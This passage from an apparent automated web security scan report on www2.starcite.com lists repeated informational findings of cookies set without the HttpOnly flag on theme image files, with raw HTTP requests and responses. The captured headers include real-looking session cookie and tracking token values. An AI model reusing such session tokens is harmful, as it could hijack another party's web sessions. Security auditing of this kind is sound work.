Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:43 GMT
Server: Apache
Last-Modified: Tue, 19 Aug 2008 18:48:00 GMT
ETag: "1000000002c9e-39c-454d486e81800"
Accept-Ranges: bytes
Content-Length: 924
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:09 GMT;path=/

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

2.124. http://www2.starcite.com/starcite/themes/garland/images/btn_sec_right.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/btn_sec_right.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/btn_sec_right.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:44 GMT
Server: Apache
Last-Modified: Tue, 19 Aug 2008 18:48:00 GMT
ETag: "1000000002c9f-39b-454d486e81800"
Accept-Ranges: bytes
Content-Length: 923
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:10 GMT;path=/

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

2.125. http://www2.starcite.com/starcite/themes/garland/images/content_left_bg0.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/content_left_bg0.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/content_left_bg0.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:27 GMT
Server: Apache
Last-Modified: Wed, 24 Sep 2008 01:10:00 GMT
ETag: "1000000002ca5-64-45799f17daa00"
Accept-Ranges: bytes
Content-Length: 100
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:53 GMT;path=/

GIF89a.......................................................!.......,............IYZS....Z.#2 p...;

2.126. http://www2.starcite.com/starcite/themes/garland/images/content_right_bg0.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/content_right_bg0.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/content_right_bg0.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:32 GMT
Server: Apache
Last-Modified: Wed, 24 Sep 2008 01:10:00 GMT
ETag: "1000000002ca7-62-45799f17daa00"
Accept-Ranges: bytes
Content-Length: 98
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:57 GMT;path=/

GIF89a.......................................................!.......,...........0.QN!........c..;

2.127. http://www2.starcite.com/starcite/themes/garland/images/footer-boxleft.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/footer-boxleft.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/footer-boxleft.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:33 GMT
Server: Apache
Last-Modified: Thu, 16 Oct 2008 23:41:00 GMT
ETag: "1000000002cb6-98-45967618d5b00"
Accept-Ranges: bytes
Content-Length: 152
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:59 GMT;path=/

GIF89a..0..    .................................................!.....    .,......0...E0%".=...:"@.u.7"...*{.#...........=./.$.gE....    .F.R..:G.V.48lF..."._".;

2.128. http://www2.starcite.com/starcite/themes/garland/images/footer-boxmiddle.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/footer-boxmiddle.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/footer-boxmiddle.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:33 GMT
Server: Apache
Last-Modified: Wed, 24 Sep 2008 01:10:00 GMT
ETag: "1000000002cb7-341-45799f17daa00"
Accept-Ranges: bytes
Content-Length: 833
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:59 GMT;path=/

GIF89a../...............................................................................................................................................................................................
...[SNIP]...

2.129. http://www2.starcite.com/starcite/themes/garland/images/footer-boxright.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/footer-boxright.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/footer-boxright.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:33 GMT
Server: Apache
Last-Modified: Thu, 16 Oct 2008 23:41:00 GMT
ETag: "1000000002cb8-98-45967618d5b00"
Accept-Ranges: bytes
Content-Length: 152
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:59 GMT;path=/

GIF89a..0..    .................................................!.....    .,......0...E..#HJ(....H..`..ev....%.....v../..3`Mx...`r.,".J(S..Z..SI$..... ..^".;

2.130. http://www2.starcite.com/starcite/themes/garland/images/grey_bbdr.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/grey_bbdr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/grey_bbdr.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:46 GMT
Server: Apache
Last-Modified: Fri, 22 Aug 2008 23:31:00 GMT
ETag: "1000000002cc3-2e-45514d4847500"
Accept-Ranges: bytes
Content-Length: 46
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:12 GMT;path=/

GIF89a..#..........!.......,......#........P.;

2.131. http://www2.starcite.com/starcite/themes/garland/images/grey_lbdr.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/grey_lbdr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/grey_lbdr.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:42 GMT
Server: Apache
Last-Modified: Fri, 22 Aug 2008 19:01:00 GMT
ETag: "1000000002cc5-41-455110eec1300"
Accept-Ranges: bytes
Content-Length: 65
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:07 GMT;path=/

GIF89a
..............................!.......,....
.......C+..$.;

2.132. http://www2.starcite.com/starcite/themes/garland/images/grey_left_bbdr1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/grey_left_bbdr1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/grey_left_bbdr1.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:46 GMT
Server: Apache
Last-Modified: Wed, 24 Sep 2008 01:10:00 GMT
ETag: "1000000002cc8-98-45799f17daa00"
Accept-Ranges: bytes
Content-Length: 152
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:11 GMT;path=/

GIF89a......................................................!......,..........E0.I...j...................L..0.u..<\"..... .1 ...gP.0..;(.......xL&G..;

2.133. http://www2.starcite.com/starcite/themes/garland/images/grey_left_tbdr.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/grey_left_tbdr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/grey_left_tbdr.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:40 GMT
Server: Apache
Last-Modified: Sat, 23 Aug 2008 02:44:00 GMT
ETag: "1000000002ccb-394-4551786bd3c00"
Accept-Ranges: bytes
Content-Length: 916
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:06 GMT;path=/

GIF89a..(...............................................................................................................................................................................................
...[SNIP]...

2.134. http://www2.starcite.com/starcite/themes/garland/images/grey_rbdr.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/grey_rbdr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/grey_rbdr.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:45 GMT
Server: Apache
Last-Modified: Fri, 22 Aug 2008 19:01:00 GMT
ETag: "1000000002cce-2c-455110eec1300"
Accept-Ranges: bytes
Content-Length: 44
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:11 GMT;path=/

GIF89a
............!.......,....
.......P.;

2.135. http://www2.starcite.com/starcite/themes/garland/images/grey_right_bbdr1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/grey_right_bbdr1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/grey_right_bbdr1.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:46 GMT
Server: Apache
Last-Modified: Wed, 24 Sep 2008 01:10:00 GMT
ETag: "1000000002cd1-97-45799f17daa00"
Accept-Ranges: bytes
Content-Length: 151
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:11 GMT;path=/

GIF89a.....
.................................................!.....
.,..........D0.I+E6[.{.^f..HZ.I.......3Y..v.9.O......(...xL....1......!..r...@....;

2.136. http://www2.starcite.com/starcite/themes/garland/images/grey_right_tbdr.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/grey_right_tbdr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/grey_right_tbdr.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:40 GMT
Server: Apache
Last-Modified: Sat, 23 Aug 2008 02:44:00 GMT
ETag: "1000000002cd3-a8-4551786bd3c00"
Accept-Ranges: bytes
Content-Length: 168
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:06 GMT;path=/

GIF89a..(....................................................,......(...].5F..e(...`..@"th.9......l.....^.....E.g..q.\....4:uV..cv..v.]X7fF.gTY.F..m..>.K.........u..;

2.137. http://www2.starcite.com/starcite/themes/garland/images/grey_tbdr.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/grey_tbdr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/grey_tbdr.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:40 GMT
Server: Apache
Last-Modified: Fri, 22 Aug 2008 19:01:00 GMT
ETag: "1000000002cd6-3c-455110eec1300"
Accept-Ranges: bytes
Content-Length: 60
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:06 GMT;path=/

GIF89a..#............................,......#...    .C+.$.IkM.;

2.138. http://www2.starcite.com/starcite/themes/garland/images/header_top-ie.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/header_top-ie.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/header_top-ie.png HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:23 GMT
Server: Apache
Last-Modified: Thu, 11 Feb 2010 19:40:23 GMT
ETag: "10000000031a1-fe2-47f58526457c0"
Accept-Ranges: bytes
Content-Length: 4066
Content-Type: image/png
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:49 GMT;path=/

.PNG
.
...IHDR.......
.....RX.7...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

2.139. http://www2.starcite.com/starcite/themes/garland/images/href_arrow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/href_arrow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/href_arrow.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:43 GMT
Server: Apache
Last-Modified: Fri, 22 Aug 2008 19:01:00 GMT
ETag: "1000000002cdd-59-455110eec1300"
Accept-Ranges: bytes
Content-Length: 89
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:09 GMT;path=/

GIF89a    .......................s......!.......,....    ......h...........7.R!|....i.......    .;

2.140. http://www2.starcite.com/starcite/themes/garland/images/left_bdr.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/left_bdr.gif

Issue detail

